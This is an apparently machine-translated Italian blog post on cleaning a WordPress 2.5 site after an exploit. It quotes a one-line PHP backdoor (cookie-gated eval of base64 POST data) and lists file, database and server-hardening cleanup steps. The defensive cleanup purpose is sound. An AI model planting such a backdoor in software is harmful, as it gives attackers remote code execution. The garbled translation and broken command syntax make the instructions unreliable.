Prima di leggere questo post, si dovrebbe vedere postare qui, Per capire qualcosa. :)
L'ho trovato in diversi file di blog su stealthsettings.com, codici simili a quelli riportati di seguito, sono apparsi a seguito dell'infezione da l'impresa di WordStampa.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Se è il file indicato sopra xmlrpc.php della assonnatoMa ad un grep server, è possibile vedere che ci sono un bel po 'del suo genere nel codice sorgente.
Pulizia file infetti:
Ooookkkk ...
1. La soluzione, dopo che essa aveva di riservaE pulito il database è quello di pulire file WordPress (puoi tenere wp-config.php e file non strettamente correlati alla piattaforma wp, dopo averli attentamente controllati) dal server e caricare quelli originali dalla versione 2.5.1 (Durante questo fare un WP versione di aggiornamento :)) http://wordpress.org/download/ . Pulire inclusi i file di tema, se non vi fidate che la loro attento esame.
Sembra che sia stato colpito e file dei temi che non sono stati utilizzati prima sul blog e semplicemente cambiando il tema, non risolve il problema.
./andreea/wp-content/themes/default/index.php:
2. Cercare ed eliminare tutti i file contenenti: * _new.php, _old.php *, * Jpgg, Giff *, * Pngg e il file wp-info.txt, se presente....
trova. -name "* _new.php"
trova. -name "* _old.php"
trova. -name "* .jpgg"
trova. -name "* _giff"
trova. -name "* _pngg"
trova. -name "wp-info.txt"
3. in / Tmp , Cercare e cancellare cartelle come tmpYwbzT2
SQL pulizia :
1. nella tabella Tabella wp_options vedere se vi è eliminare le righe: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Tutto in wp_options, vai a active_plugins e cancellare se c'è un plugin che termina in una delle estensioni * _new.php, _old.php *, *. jpgg, *. GIFF, *. pngg o se si sospetta un altro interno, controllare attentamente.
3. In Tabella wp_users, Vedere se c'è un utente che non ha scritto nulla nella destra, la colonna user_nicename. Elimina questo utente, ma ricorda il numero sulla colonna ID. È probabile che questo utente utilizzi "WordPremere" come user_login e sembra essere creato su 00: 00: 00 0000-00-00.
4. Vai alla tabella wp_usermeta e cancellare tutte le linee appartenenti ID sopra.
Dopo aver eseguito questa pulizia sql, disabilitare e quindi attivare qualsiasi plug-in. (nel blog -> Dashboard -> Plugin)
Server sicuro:
1. Vedere ciò che file e directory sono "scrivibile"(chmod 777) e prova a mettere a chmod che non ne consentirà più la scrittura a nessun livello. (chmod 644, per esempio)
Trova. -Perm-2-ls
2. Vedere ciò che i file hanno il bit suid o sgid . Se non si utilizzano i file messo su di loro chmod 0 o disinstallare il pacchetto che lo contiene. Sono molto pericolosi, perché privilegi di esecuzione "gruppo"O"radice"E non con privilegi di utente normale per eseguire il file.
find /-type f-perm-04000-ls
find /-type f-perm-02000-ls
3. Controllare che le porte sono aperte e provare a chiudere o fissare quelli che non vengono utilizzati.
netstat-an | grep-i listen
A proposito di esso. Capisco Alcuni blog sono vietati de Google Search e altri dicono "Li ha fatti bene!!!" . Beh, l'avrei fatto per loro... ma che ne dici se Google inizia a bannare tutti i siti formando E 'SPAM e mettere Trojan (Trojan.Clicker.HTML) nei cookie?
1 pensiero su "WordPress Exploit - Pulisci i file dei virus, SQL e la sicurezza del server. ”